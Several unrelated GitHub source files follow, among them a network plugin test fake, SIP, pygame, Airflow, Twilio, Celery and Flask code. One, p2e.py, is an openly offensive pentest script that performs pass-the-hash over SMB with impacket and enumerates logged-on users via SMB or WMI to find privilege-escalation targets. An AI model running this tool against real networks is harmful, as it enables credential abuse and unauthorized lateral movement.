def update_network(self, context, id, network):
session = context.session
with session.begin(subtransactions=True):
net = super(Fake1, self).update_network(context, id,
network)
self._process_l3_update(context, network['network'], id)
self._extend_network_dict_l3(context, net)
return net
def delete_network(self, context, id):
return super(Fake1, self).delete_network(context, id)
def create_port(self, context, port):
port = super(Fake1, self).create_port(context, port)
return port
def create_subnet(self, context, subnet):
subnet = super(Fake1, self).create_subnet(context, subnet)
return subnet
def update_port(self, context, id, port):
port = super(Fake1, self).update_port(context, id, port)
return port
def delete_port(self, context, id, l3_port_check=True):
return super(Fake1, self).delete_port(context, id)
class Fake2(Fake1):
def fake_func(self):
return 'fake2'
def fake_func2(self):
return 'fake2'
| {
"content_hash": "935a889d813ff9ba9550bde20b8231e6",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 75,
"avg_line_length": 33.526315789473685,
"alnum_prop": 0.6347462061747776,
"repo_name": "psiwczak/quantum",
"id": "98a9884bcfb29d64ac61925c6209592eff3d2a71",
"size": "2576",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "quantum/tests/unit/metaplugin/fake_plugin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Perl",
"bytes": "32974"
},
{
"name": "Python",
"bytes": "2446843"
},
{
"name": "Scala",
"bytes": "3005"
},
{
"name": "Shell",
"bytes": "7879"
}
],
"symlink_target": ""
} |
import win32com.client
import argparse
import win32security
import win32net
import win32netcon
import re
import string
from impacket.structure import Structure
from impacket.nmb import NetBIOSTimeout
from impacket.dcerpc import transport
from impacket import uuid
from struct import pack
# Get arguments to run the script
parser = argparse.ArgumentParser(prog='p2e.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    description='Find running processes that can be used to escalate access.',
epilog='Example: p2e.py --iplist iplist.txt --user test --pass testpass --domain testdomain --type smb')
parser.add_argument('--iplist',
required=True,
help='file list of IPs that we can login with using provided username and password')
parser.add_argument('--user',
required=True,
help='the username to use for authentication')
parser.add_argument('--pass',
required=True,
help='the password to use for authentication')
parser.add_argument('--domain',
default='',
help='the Domain to use for authentication')
parser.add_argument('--type',
required=True,
default='smb',
help='which type of connection to we use, WMI or SMB')
parser.set_defaults(domain='', type='smb')
# Function for use in PtH attack
def utf16(str):
return str.encode('utf_16_le')
# Class for use in PtH attack
class B1(Structure):
alignment = 4
structure = (
('id', '<L=0x41414141'),
('max', '<L'),
('offset', '<L=0'),
('actual', '<L'),
('str', '%s'),
)
# Class for use in PtH attack
class NetrWkstaUserEnum(Structure):
alignment = 4
opnum = 2
structure = (
('server', ':', B1),
('info_level1', '<L=1'),
('info_level2', '<L=1'),
('referent_id1', '<L=0x42424242'),
('num_entries', '<L=0'),
('null_pointer', '<L=0'),
('max_len', '<L'),
('referent_id2', '<L=0x43434343'),
('enumeration_handle', '<L=0x00000000'),
)
# Stick arguments in variable
args = vars(parser.parse_args())
# Load file containing IP list
ips = open(args['iplist'])
# Variable to store unique users in
uniqUsers = dict()
# Function for performing pass the hash
# This function relies on the Core Impacket library
def pth(server):
# Split the hash
lmhash, nthash = args['pass'].split(':')
# Setup memory, pipe, and MSRPC bindings for DCE RPC connection
memory_size = 1024 * 1024
pipe = 'wkssvc'
UUID = ('6bffd098-a112-3610-9833-46c3f87e345a ', '1.0')
port = '445'
stringbinding = "ncacn_np:%(server)s[\\pipe\\%(pipe)s]"
stringbinding %= {'server':server, 'pipe':pipe}
query = NetrWkstaUserEnum()
host = "%s\x00" % (server)
query['server'] = B1()
query['server']['id'] = 0x41414141
query['server']['actual'] = len(host)
query['server']['max'] = len(host)
query['server']['str'] = utf16(host)
query['max_len'] = memory_size
# Create the DCE RPC connection, pass in credentials
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
trans.set_credentials(args['user'], '', args['domain'], lmhash, nthash)
# Attempt to make a connection, if not then it failed and move on
try:
# Establish DCE RPC connection
trans.connect()
dce = trans.DCERPC_class(trans)
# Bind or fail
try:
# Bind the the correct \\wkssvc UUDI
dce.bind(uuid.uuidtup_to_bin((UUID[0], UUID[1])))
except:
print '[*] SMB connection to '+server+' failed'
# Make the query to NetrWkstaUserEnum on the target to get unique users or fail
try:
dce.call(query.opnum, query)
# If the query suceeded, receive data or fail
try:
raw = dce.recv()
status = raw[-4:]
# Check for a successful status, if so continue to grab users
if(status == pack("<L", 0x00000000)):
# Perform a bunch of encoding/decoding to remove junk I don't want
# Couldn't find any good references on packet structure, so this is ugly
# Converting to hex, replacing non-printable characters with chars like ; and \ that can be parsed
rawData = raw.decode('utf-8', 'ignore')
hexData = u''.join(rawData).encode('hex').strip()
stripData = re.sub('0000000000060000000000000006000000', '5c', hexData)
stripData = re.sub('00000001000000000000000100000000000000080000000000000008000000', '3b', stripData)
stripData = re.sub('0000000[a-efA-F0-9]000000000000000[a-fA-F0-9]000000', '3b', stripData)
stripData = re.sub('0200070000000000000007000000', '3b', stripData)
stripData = re.sub('000000100000000000000010000000', '3b', stripData)
cleanData = ''.join(filter(lambda x: x in string.printable, stripData.strip().decode('hex')))
# Split on the characters that were replaced with ;
pairs = cleanData.split(';')
pair = 0
# For each pair, add the unique user to the dict
for i in pairs:
if pair > 0:
if re.search('\\\\', i):
cred = i.split('\\')
uniqUsers[cred[1]+'\\'+cred[0]] = cred[1]+'\\'+cred[0]
pair += 1
except:
print '[*] SMB connection to '+server+' failed'
except:
print '[*] SMB connection to '+server+' failed'
except:
print '[*] SMB connection to '+server+' failed'
# Function to use standard SMB libraries with username + password
def smbUsers(server):
fixDomain = ''
# If the domain is set, use it else use . which is basically an empty domain
if re.search('^[a-zA-Z0-9]', args['domain']):
fixDomain = args['domain']
else:
fixDomain = '.'
# Impersonate the user passed as the --user --pass credentials
handle = win32security.LogonUser(
args['user'],
fixDomain,
args['pass'],
win32security.LOGON32_LOGON_NEW_CREDENTIALS,
win32security.LOGON32_PROVIDER_DEFAULT
)
# Complete impersonation
win32security.ImpersonateLoggedOnUser(handle)
# Try to make an SMB connection, else fail
try:
resume=1
pref=win32netcon.MAX_PREFERRED_LENGTH
level=1
# Loop through each response in the connection and get users
while resume:
(userList,total,endhandle)=win32net.NetWkstaUserEnum(server,level,resume,pref)
# Loop through each user provided and add to uniqUsers dict
for i in userList:
account = i['logon_domain']+'\\'+i['username']
uniqUsers[account] = account
resume=endhandle
except:
print '[*] SMB connection to '+server+' failed'
# Function to make a WMI connection to get unique users
def wmiUsers(server):
# Attempt to make a WMI connection
try:
wmiUser = args['user']
# If domain option was passed (--domain) use it as part of the account
if re.search('^[a-zA-Z0-9]', args['domain']):
wmiUser = args['domain']+'\\'+args['user']
# Setup WMI and connect using provided IP, username, and password,
# then search for running processes
loc = win32com.client.Dispatch('WbemScripting.SWbemLocator')
conn = loc.ConnectServer(server, 'root\\cimv2', wmiUser, args['pass'])
processes = conn.InstancesOf('Win32_Process')
# Loop through each identified process
for process in processes:
# Get owner information for each process
disp = win32com.client.Dispatch(process)
meth = disp.Methods_('GetOwner')
methVals = disp.ExecMethod_(meth.Name)
# Build a variable containing the WORKGROUP or DOMAIN + the User account
account = str(methVals.Properties_('Domain').Value)+'\\'+str(methVals.Properties_('User').Value)
# If owner information was not null/NONE, then add to dict
if re.search('None', account) is None:
uniqUsers[account] = account
except:
print '[*] WMI connection to '+server+' failed'
# If the correct type wasn't set then bail
if re.search('^(smb|wmi)$', args['type'], re.IGNORECASE) is None:
print 'Invalid or unspecified protocol type in --type'
exit(1)
else:
print '[*] Starting scan using '+args['type']
# Loop through each IP listed in file passed with --iplist option
for ip in ips.readlines():
ip = ip.strip('\n')
print '[*] Attempting to connect to '+args['type']+' on '+ip
# If the type was SMB, pick one of the SMB functions to use, else use WMI
if re.search('^smb$', args['type'], re.IGNORECASE):
# If the password matches the lm/nt hash format, use PtH
if re.match('[a-zA-Z0-9]{32}:[a-zA-Z0-9]{32}', args['pass']):
print '[*] Passing the hash attack on '+ip
pth(ip)
else:
smbUsers(ip)
else:
wmiUsers(ip)
# Loop through unique users dict
print '[+] Unique users for '+ip
for u in uniqUsers:
print '\t[-] User: '+u
# Reset uniqUsers dict after each IP
del uniqUsers
uniqUsers = dict() | {
"content_hash": "0129361508af4b9b1f6b6cb3955708df",
"timestamp": "",
"source": "github",
"line_count": 259,
"max_line_length": 111,
"avg_line_length": 33.75289575289575,
"alnum_prop": 0.6514527568062228,
"repo_name": "codewatchorg/p2e",
"id": "4c169f888e61edbddf48f3dd9f0264cc74b1946a",
"size": "10237",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "p2e.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [],
"symlink_target": ""
} |
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from ...sipmessaging import SIPHeaderField
from ...sipmessaging import classproperty
class CallInfoSIPHeaderField(SIPHeaderField):
# noinspection PyNestedDecorators
@classproperty
@classmethod
def canonical_field_name(cls):
return 'Call-Info'
@classmethod
def new_for_attributes(cls, field_name="Call-Info", field_value_string=""):
return cls.new_for_field_name_and_value_string(field_name=field_name, field_value_string=field_value_string)
@property
def is_call_info(self):
return True
# http://www.iana.org/assignments/sip-parameters/sip-parameters.xhtml#sip-parameters-2
@property
def m(self):
return self.parameter_named('m')
@m.setter
def m(self, a_string):
self.parameter_named_put('m', a_string)
@property
def purpose(self):
return self.parameter_named('purpose')
@purpose.setter
def purpose(self, a_string):
self.parameter_named_put('purpose', a_string)
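# Illustrative usage sketch (not part of the original class; the URI and
# purpose values below are made-up examples):
#   header = CallInfoSIPHeaderField.new_for_attributes(
#       field_value_string="<http://example.com/photo.png>")
#   header.purpose = "icon"   # sets the 'purpose' parameter via the setter above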
| {
"content_hash": "643c4630d77dbd0cea8ff2c23872a7ab",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 116,
"avg_line_length": 27.897435897435898,
"alnum_prop": 0.6893382352941176,
"repo_name": "bobjects/BobStack",
"id": "dae8e703c50b5d169e366e6c1aa2fdb49ae96848",
"size": "1088",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bobstack/sipmessaging/concreteheaderfields/callInfoSIPHeaderField.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "59"
},
{
"name": "Perl",
"bytes": "576"
},
{
"name": "Python",
"bytes": "922808"
},
{
"name": "Shell",
"bytes": "13516"
}
],
"symlink_target": ""
} |
import pygame
from constants import SCREEN, SCREEN_WIDTH, SCREEN_HEIGHT, SHOW_FPS, MAX_FPS, CHROMA_KEY
from level import Level
from load_level import Read_File
from misc_functions import show_fps
from confirmation import Confirmation
import sound
def Save_Level(map_data, archivo):
for linea in map_data['mapa']:
archivo.write(linea)
archivo.write('\n')
archivo.write(':Fondo ' + map_data['fondo'] + '\n')
archivo.write(':Musica ' + map_data['musica'] + '\n')
archivo.write(':Pared ' + map_data['pared'] + '\n')
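# Illustrative shape of the map_data dict consumed above (hedged; the values
# are hypothetical, only the keys are taken from this module):
#   {'mapa': ['WWWW...', ...], 'fondo': 'bg1', 'musica': 'track1', 'pared': 'wall1'}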
def Test_Level(map_data, archivo, MUTE_MUSIC):
Save_Level(map_data, archivo)
archivo.close()
#print map_data['mapa'][1]
return Level('temp', MUTE_MUSIC, 's3kfileselect', 'custom/', 'NivComp')
def Edit_Level(lvl_num, MUTE_MUSIC):
try:
lvl_name = 'custom' + str(lvl_num)
base = open('levels/custom/' + lvl_name +'.txt', 'r')
base.close()
except:
lvl_name = 'base_lvl'
templvl = open('levels/custom/temp.txt', 'w')
EXIT_MENU = False
EXIT_GAME = False
finished_level = False
x_position = []
y_position = []
for i in range(32):
x_position.append(i*32)
if i < 18:
y_position.append(i*32)
#print x_position
#print y_position
wall_image = pygame.image.load('images/tiles/wall_base.png').convert()
box_image = pygame.image.load('images/tiles/box.png').convert()
player_image = pygame.image.load('images/Isaac/stand.png').convert()
player_image.set_colorkey(CHROMA_KEY)
jump_image = pygame.image.load('images/tiles/jumpbox.png').convert()
door_image = pygame.image.load('images/tiles/door.png').convert()
door_image.set_colorkey(CHROMA_KEY)
spike_image = pygame.image.load('images/tiles/spike.png').convert()
spike_image.set_colorkey(CHROMA_KEY)
filter_image = pygame.image.load('images/tiles/boxfilter.png').convert()
filter_image.set_colorkey(CHROMA_KEY)
gravi_image = pygame.image.load('images/tiles/gravi_base.png').convert()
gravi_image.set_colorkey(CHROMA_KEY)
checkpoint_image = pygame.image.load('images/tiles/checkpoint_base.png').convert()
checkpoint_image.set_colorkey(CHROMA_KEY)
eraser_image = pygame.image.load('images/tiles/blank.png').convert()
eraser_image.set_colorkey(CHROMA_KEY)
editor_screen = pygame.Surface((1024,576))
editor_screen.fill((175,167,124))
    data = {} # map info
if lvl_name == 'base_lvl':
data['mapa'], data['fondo'], data['musica'], data['pared'], data['graviswitch'], data['g_spin'], data['g_spin_spd'] = Read_File('custom/base_lvl.txt')
else:
data['mapa'], data['fondo'], data['musica'], data['pared'], data['graviswitch'], data['g_spin'], data['g_spin_spd'] = Read_File('custom/'+ lvl_name + '.txt')
current_y1 = 0
for linea in data['mapa']:
current_x1 = 0
for cuadro in linea.strip('\n'):
if cuadro == 'W':
editor_screen.blit(wall_image, (current_x1*32,current_y1*32))
elif cuadro == 'P':
editor_screen.blit(player_image, (current_x1*32,current_y1*32))
elif cuadro == 'B':
editor_screen.blit(box_image, (current_x1*32,current_y1*32))
elif cuadro == 'J':
editor_screen.blit(jump_image, (current_x1*32,current_y1*32))
elif cuadro == 'S':
editor_screen.blit(spike_image, (current_x1*32,current_y1*32))
elif cuadro == 'D':
editor_screen.blit(door_image, (current_x1*32,current_y1*32))
elif cuadro == 'F':
editor_screen.blit(filter_image, (current_x1*32,current_y1*32))
elif cuadro == 'C':
editor_screen.blit(checkpoint_image, (current_x1*32,current_y1*32))
elif cuadro == 'G':
                editor_screen.blit(gravi_image, (current_x1*32,current_y1*32))
current_x1 += 1
current_y1 +=1
pygame.display.set_mode((SCREEN_WIDTH +192, SCREEN_HEIGHT))
fondo = pygame.image.load('images/backgrounds/lvl_editor.png').convert()
    current_x1 = 0  # reusing variables
current_y1 = 0
cursor_image1 = pygame.image.load('images/gui/cursor/lvl_editor1.png').convert()
cursor_image1.set_colorkey(CHROMA_KEY)
cursor_rect1 = cursor_image1.get_rect()
x2_pos = [1035, 1099, 1037]
y2_pos = [69,133,197, 255, 312, 413,466,519]
states = [['W','B','F','G','P','B1','B2','B3'],['D','J','S','C', ' ','B1','B2','B3'], ['W','B','F','G',' ','B1','B2','B3']]
current_x2 = 0
current_y2 = 0
cursor_image2a = pygame.image.load('images/gui/cursor/lvl_editor2.png').convert()
cursor_image2a.set_colorkey(CHROMA_KEY)
cursor_image2b = pygame.image.load('images/gui/cursor/lvl_editor3.png').convert()
cursor_image2b.set_colorkey(CHROMA_KEY)
cursor_image2 = cursor_image2a
cursor_rect2 = cursor_image2.get_rect()
cursor2_state = 'W'
players_count = 1
clock = pygame.time.Clock()
while not EXIT_MENU:
        cursor_pos1 = [x_position[current_x1], y_position[current_y1]] # update cursor position
cursor_pos2 = [x2_pos[current_x2], y2_pos[current_y2]]
cursor_rect1.topleft = cursor_pos1
cursor_rect2.topleft = cursor_pos2
cursor2_state = states[current_x2][current_y2]
#print cursor2_state
SCREEN.blit(fondo,(0,0))
SCREEN.blit(editor_screen,(0,0))
SCREEN.blit(cursor_image1,cursor_rect1)
SCREEN.blit(cursor_image2,cursor_rect2)
pygame.display.flip()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_d:
sound.cursorleft.play()
if current_x1 == 31:
current_x1 = 0
else:
current_x1 += 1
elif event.key == pygame.K_a:
sound.cursorleft.play()
if current_x1 == 0:
current_x1 = 31
else:
current_x1 -= 1
elif event.key == pygame.K_w:
sound.cursorleft.play()
if current_y1 == 0:
current_y1 = 17
else:
current_y1 -= 1
elif event.key == pygame.K_s:
sound.cursorleft.play()
if current_y1 == 17:
current_y1 = 0
else:
current_y1 += 1
elif event.key == pygame.K_RIGHT:
sound.cursorright.play()
if current_x2 == 1:
current_x2 = 0
elif current_x2 == 3 or current_x2 == 2:
pass
else:
current_x2 += 1
elif event.key == pygame.K_LEFT:
sound.cursorright.play()
if current_x2 == 0:
current_x2 = 1
elif current_x2 == 3 or current_x2 == 2:
pass
else:
current_x2 -= 1
elif event.key == pygame.K_UP:
sound.cursorright.play()
if current_y2 == 0:
current_y2 = 7
current_x2 = 2
cursor_image2 = cursor_image2b
elif current_y2 == 5:
current_x2 = 0
cursor_image2 = cursor_image2a
current_y2 -=1
else:
current_y2 -= 1
elif event.key == pygame.K_DOWN:
sound.cursorright.play()
if current_y2 == 4:
current_x2 = 2
current_y2 +=1
cursor_image2 = cursor_image2b
elif current_y2 == 7:
current_y2 = 0
current_x2 = 0
cursor_image2 = cursor_image2a
else:
current_y2 += 1
elif event.key == pygame.K_RETURN:
if cursor2_state == 'B1':
if players_count == 1:
finished_level, null, null, MUTE_MUSIC, prev_song = Test_Level(data, templvl, MUTE_MUSIC)
if EXIT_MENU:
return EXIT_GAME, MUTE_MUSIC
templvl = open('levels/custom/temp.txt', 'w')
SCREEN.blit(fondo,(0,0))
pygame.display.flip()
music = pygame.mixer.music.load('sound/music/JumpingBat.wav')
prev_song = 's3kfileselect'
pygame.mixer.music.set_volume(1.0)
pygame.mixer.music.play(-1)
if MUTE_MUSIC:
pygame.mixer.music.pause()
else:
sound.no.play()
elif cursor2_state == 'B2':
if finished_level:
archivo = open('levels/custom/custom' + str(lvl_num) + '.txt', 'w')
for linea in data['mapa']:
archivo.write(linea + '\n')
archivo.write(':Fondo ' + data['fondo'] + '\n')
archivo.write(':Musica ' + data['musica'] + '\n')
archivo.write(':Pared ' + data['pared'] + '\n')
archivo.close()
sound.lvlsaved.play()
#print 'GUADADO'
else:
sound.no.play()
#print 'NOOOOO'
elif cursor2_state == 'B3' and Confirmation():
EXIT_MENU = True
#elif players_count == 1 and data['mapa'][current_y1][current_x1] == 'P':
#sound.no.play()
else:
if cursor2_state == 'W':
paste_image = wall_image
elif cursor2_state == 'B':
paste_image = box_image
elif cursor2_state == 'J':
paste_image = jump_image
elif cursor2_state == 'S':
paste_image = spike_image
elif cursor2_state == 'D':
paste_image = door_image
elif cursor2_state == 'F':
paste_image = filter_image
elif cursor2_state == 'C':
paste_image = checkpoint_image
elif cursor2_state == 'G':
paste_image = gravi_image
elif cursor2_state == 'P':
paste_image = player_image
editor_screen.blit(eraser_image, (current_x1*32,current_y1*32))
players_count += 1
elif cursor2_state == ' ':
paste_image = eraser_image
if data['mapa'][current_y1][current_x1] == 'P':
players_count -=1
editor_screen.blit(paste_image, (current_x1*32,current_y1*32))
templine = ''
temp_x = 0
for cuadro in data['mapa'][current_y1]:
if temp_x == current_x1:
templine += cursor2_state
else:
templine += cuadro
temp_x += 1
data['mapa'][current_y1] = templine
#if event.type == pygame.
#fsdfsdfsdfsdf
FPS = clock.get_fps()
if SHOW_FPS:
show_fps(FPS)
clock.tick(MAX_FPS)
pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
return EXIT_GAME, MUTE_MUSIC
| {
"content_hash": "8c65310f71ea3906a5fcbf521eeba4d6",
"timestamp": "",
"source": "github",
"line_count": 287,
"max_line_length": 159,
"avg_line_length": 32.944250871080136,
"alnum_prop": 0.6268640930724484,
"repo_name": "AsparagusEdu/GraviSwitch",
"id": "cc208409a4b887052881576efb347675ba0d1016",
"size": "9455",
"binary": false,
"copies": "1",
"ref": "refs/heads/ReMaster",
"path": "code/level_editor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "96629"
}
],
"symlink_target": ""
} |
import logging
from airflow.contrib.hooks.bigquery_hook import BigQueryHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class BigQueryOperator(BaseOperator):
"""
Executes BigQuery SQL queries in a specific BigQuery database
"""
template_fields = ('bql', 'destination_dataset_table')
template_ext = ('.sql',)
ui_color = '#e4f0e8'
@apply_defaults
def __init__(self,
bql,
destination_dataset_table = False,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
bigquery_conn_id='bigquery_default',
delegate_to=None,
udf_config=False,
*args,
**kwargs):
"""
Create a new BigQueryOperator.
:param bql: the sql code to be executed
:type bql: Can receive a str representing a sql statement,
a list of str (sql statements), or reference to a template file.
Template reference are recognized by str ending in '.sql'
:param destination_dataset_table: A dotted
(<project>.|<project>:)<dataset>.<table> that, if set, will store the results
of the query.
:type destination_dataset_table: string
:param bigquery_conn_id: reference to a specific BigQuery hook.
:type bigquery_conn_id: string
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have domain-wide
delegation enabled.
:type delegate_to: string
:param udf_config: The User Defined Function configuration for the query.
See https://cloud.google.com/bigquery/user-defined-functions for details.
:type udf_config: list
"""
super(BigQueryOperator, self).__init__(*args, **kwargs)
self.bql = bql
self.destination_dataset_table = destination_dataset_table
self.write_disposition = write_disposition
self.allow_large_results = allow_large_results
self.bigquery_conn_id = bigquery_conn_id
self.delegate_to = delegate_to
self.udf_config = udf_config
def execute(self, context):
logging.info('Executing: %s', str(self.bql))
hook = BigQueryHook(bigquery_conn_id=self.bigquery_conn_id,
delegate_to=self.delegate_to)
conn = hook.get_conn()
cursor = conn.cursor()
cursor.run_query(self.bql, self.destination_dataset_table, self.write_disposition,
self.allow_large_results, self.udf_config)
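# Illustrative usage sketch (not part of the operator itself). It assumes an
# existing DAG object named `dag` and a BigQuery connection configured under
# `bigquery_default`; the SQL and table names are hypothetical:
#
#   bq_task = BigQueryOperator(
#       task_id="example_bq_query",
#       bql="SELECT COUNT(*) FROM my_dataset.my_table",
#       destination_dataset_table="my_project:my_dataset.results_table",
#       write_disposition="WRITE_TRUNCATE",
#       bigquery_conn_id="bigquery_default",
#       dag=dag)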
| {
"content_hash": "446fff8ff51ce0c482fecdb7ddff5611",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 90,
"avg_line_length": 41.90625,
"alnum_prop": 0.6196868008948546,
"repo_name": "mylons/incubator-airflow",
"id": "b4e4b0e89884b582578227d0b7368806317fa5f4",
"size": "3249",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "airflow/contrib/operators/bigquery_operator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "56963"
},
{
"name": "HTML",
"bytes": "139938"
},
{
"name": "JavaScript",
"bytes": "1370838"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Python",
"bytes": "1439584"
},
{
"name": "Shell",
"bytes": "18638"
}
],
"symlink_target": ""
} |
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Counties',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80)),
('state', models.IntegerField(blank=True, null=True)),
('poly', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
],
options={
'verbose_name': 'US Counties',
'verbose_name_plural': 'Counties',
},
),
]
| {
"content_hash": "d3da2aaf0ddeab518459fa2589513ea7",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 114,
"avg_line_length": 29.96153846153846,
"alnum_prop": 0.55198973042362,
"repo_name": "ngageoint/geoq",
"id": "bfe6ee954dba6b6331cae9d2ee018f5edbda9625",
"size": "828",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "geoq/locations/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "167032"
},
{
"name": "Dockerfile",
"bytes": "834"
},
{
"name": "HTML",
"bytes": "311431"
},
{
"name": "JavaScript",
"bytes": "6919093"
},
{
"name": "Less",
"bytes": "16412"
},
{
"name": "Python",
"bytes": "575801"
},
{
"name": "Shell",
"bytes": "2484"
}
],
"symlink_target": ""
} |
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
account = "ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
token = "your_auth_token"
client = Client(account, token)
notification = client.notify.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.notifications.create(identity="00000001", body="Hello Bob")
print(notification)
| {
"content_hash": "e2d8fa649c8b40a02131e6a36d1c8321",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 77,
"avg_line_length": 33.18181818181818,
"alnum_prop": 0.7917808219178082,
"repo_name": "teoreteetik/api-snippets",
"id": "0864b2640e7cec9aa296021f75340e857c6c0b47",
"size": "556",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "notifications/rest/notifications/send-notification/send-notification.6.x.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "643369"
},
{
"name": "HTML",
"bytes": "335"
},
{
"name": "Java",
"bytes": "943336"
},
{
"name": "JavaScript",
"bytes": "539577"
},
{
"name": "M",
"bytes": "117"
},
{
"name": "Mathematica",
"bytes": "93"
},
{
"name": "Objective-C",
"bytes": "46198"
},
{
"name": "PHP",
"bytes": "538312"
},
{
"name": "Python",
"bytes": "467248"
},
{
"name": "Ruby",
"bytes": "470316"
},
{
"name": "Shell",
"bytes": "1564"
},
{
"name": "Swift",
"bytes": "36563"
}
],
"symlink_target": ""
} |
from celery import Celery
def make_celery(app):
celery = Celery(app.import_name, backend=app.config['CELERY_RESULT_BACKEND'],
broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
celery.config_from_object('celeryconfig')
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
##Celery task level events
#state = celery.events.State()
#def announce_failed_tasks(event):
# state.event(event)
# # task name is sent only with -received event, and state
# # will keep track of this for us.
# task = state.tasks.get(event['uuid'])
# print('TASK FAILED: %s[%s] %s' % (
# task.name, task.uuid, task.info(),))
#with celery.connection() as connection:
# recv = celery.events.Receiver(connection, handlers={
# 'task-failed': announce_failed_tasks,
# })
# recv.capture(limit=None, timeout=None, wakeup=True)
return celery
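# Minimal usage sketch (hedged): it assumes a Flask app, a local celeryconfig
# module (loaded via config_from_object above) and a reachable broker; the
# broker/backend URLs are placeholders.
#
#   from flask import Flask
#   flask_app = Flask(__name__)
#   flask_app.config.update(
#       CELERY_BROKER_URL="redis://localhost:6379/0",
#       CELERY_RESULT_BACKEND="redis://localhost:6379/0")
#   celery = make_celery(flask_app)
#
#   @celery.task()
#   def add_together(a, b):
#       return a + b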
| {
"content_hash": "476288112c217c703962f1a6ec302c0a",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 81,
"avg_line_length": 32.611111111111114,
"alnum_prop": 0.6030664395229983,
"repo_name": "rtx3/Microburst",
"id": "9260d31da76f8c2ec70c78d874ca5648a1ea6a8c",
"size": "1198",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ray/make_celery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1122616"
},
{
"name": "HTML",
"bytes": "325384"
},
{
"name": "JavaScript",
"bytes": "3170235"
},
{
"name": "Python",
"bytes": "142487"
}
],
"symlink_target": ""
} |
from flask import jsonify
from . import api
@api.app_errorhandler(400)
def bad_request(e):
response = jsonify({"error": "bad request"})
response.status_code = 400
return response
@api.app_errorhandler(403)
def forbidden(e):
response = jsonify({"error": "forbidden"})
response.status_code = 403
return response
@api.app_errorhandler(404)
def page_not_found(e):
response = jsonify({"error": "not found"})
response.status_code = 404
return response
@api.app_errorhandler(405)
def method_not_allowed(e):
response = jsonify({"error": "method not allowed"})
response.status_code = 405
return response
@api.app_errorhandler(500)
def internal_server_error(e):
response = jsonify({"error": "internal server error"})
response.status_code = 500
return response
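# Because these handlers are registered with app_errorhandler on the blueprint,
# they apply application-wide; e.g. requesting an unknown URL would return a
# 404 response whose JSON body is {"error": "not found"} (illustrative).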
| {
"content_hash": "527976a49c4915e9ca7440a15747f7fb",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 58,
"avg_line_length": 22.054054054054053,
"alnum_prop": 0.6850490196078431,
"repo_name": "a-rank/avaandmed",
"id": "37b1587d0597d3d74c611fbca2001d0fdc8825a4",
"size": "1391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/api_v1/errors.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "89299"
},
{
"name": "Shell",
"bytes": "98"
}
],
"symlink_target": ""
} |
import eHive
from ReseqTrackDB import Attribute
from ReseqTrackDB import ReseqTrackDB
class StoreAttribute(eHive.BaseRunnable):
"""Store an Attribute or a list of Attributes in the DB"""
def fetch_input(self):
hostname = self.param_required('hostname')
username = self.param_required('username')
db = self.param_required('db')
port = self.param_required('port')
pwd = self.param_required('pwd')
reseqdb = ReseqTrackDB(host=hostname, user=username, port=port, pwd=pwd, db=db)
self.param('reseqdb', reseqdb)
def run(self):
attrb = self.param_required('attrb')
reseqdb = self.param('reseqdb')
attO = Attribute(attrb['table_name'], attrb['other_id'], attrb['name'], attrb['value'])
self.warning('Attribute with name: {0}'.format(attO.name))
if self.param_required('store_attributes') == 'True':
attO.store(reseqdb)
self.warning('Attribute with name: {0} was stored in DB'.format(attO.name))
def write_output(self):
self.warning('Work is done!')
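# Illustrative parameter shape (hedged; the values are hypothetical, the keys
# are the ones read in run() above):
#   attrb = {'table_name': 'file', 'other_id': 1234,
#            'name': 'NO_DUPLICATES', 'value': '0.02'}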
| {
"content_hash": "69fefde731e214f68e9a6f7c20928157",
"timestamp": "",
"source": "github",
